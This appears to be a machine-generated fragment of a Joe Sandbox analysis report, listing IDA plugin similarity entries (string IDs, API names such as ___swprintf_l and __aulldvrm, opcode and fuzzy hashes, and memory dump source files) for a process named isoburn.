                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 885266447-605551621
                                                            • Opcode ID: 3d339c65928cdea49ea93904d633ebc95de9abbccd0af834431271065e661488
                                                            • Instruction ID: 0a839670b6590146684e483424cb1be07afc643c68226f9ec2e7c3a9d623e063
                                                            • Opcode Fuzzy Hash: 3d339c65928cdea49ea93904d633ebc95de9abbccd0af834431271065e661488
                                                            • Instruction Fuzzy Hash: C4411031700616ABE720DE65CD41F66B7A5FB86718F100B28F955EB240DB31F852CBD1
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: %%%u$]:%u
                                                            • API String ID: 48624451-3050659472
                                                            • Opcode ID: b2cbe88f55c32e7767cdd299079e9ab520be970fe8712659361210dadec6a240
                                                            • Instruction ID: 1be764c2406a10ed49e3df29cecb6c2797016fdba19360d972b57d189622f4e8
                                                            • Opcode Fuzzy Hash: b2cbe88f55c32e7767cdd299079e9ab520be970fe8712659361210dadec6a240
                                                            • Instruction Fuzzy Hash: 12313772A002199FDB20DF2DDC40FEE77BCEB44754F8445A6E849E7240EB30BA559BA1
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-
                                                            • API String ID: 1302938615-2137968064
                                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction ID: f2f7acb229f5174ac424e90911e2224fabc9bb475d77cbfdf4ea930d12bb3ab2
                                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction Fuzzy Hash: 9291A571E0020A9BFB24DE69CC80ABEB7A5EF44724F544F1AEE55E72C0E770B9418721
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $$@
                                                            • API String ID: 0-1194432280
                                                            • Opcode ID: 68e12443a5dc2b8a820da470cbb4210098a5b1e50341e5b528dcfbcbd32e4275
                                                            • Instruction ID: 4de75638dfd7a95e7bcc419abf4c2bf77efe3e0823ab8283c88c806e74f44d76
                                                            • Opcode Fuzzy Hash: 68e12443a5dc2b8a820da470cbb4210098a5b1e50341e5b528dcfbcbd32e4275
                                                            • Instruction Fuzzy Hash: 8A813E71D002699FDB319B54CC44BDEB7B8AF04754F0046EAEA19B7290D770AE84DFA0
                                                            APIs
                                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 0493CFBD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: CallFilterFunc@8
                                                            • String ID: @$@4Qw@4Qw
                                                            • API String ID: 4062629308-2383119779
                                                            • Opcode ID: 29b01e2e3d17761f01da263980aa1415be5251c8af0ddabd39a7a4296134feee
                                                            • Instruction ID: d2f3f192ed778920665a4919498330a2529d8c763168dc0fae40da4bf40951e5
                                                            • Opcode Fuzzy Hash: 29b01e2e3d17761f01da263980aa1415be5251c8af0ddabd39a7a4296134feee
                                                            • Instruction Fuzzy Hash: 25419F71D04214DFDB219FA9D840AAEBBB9EF85B04F00463AE915EB250D774F805CBA1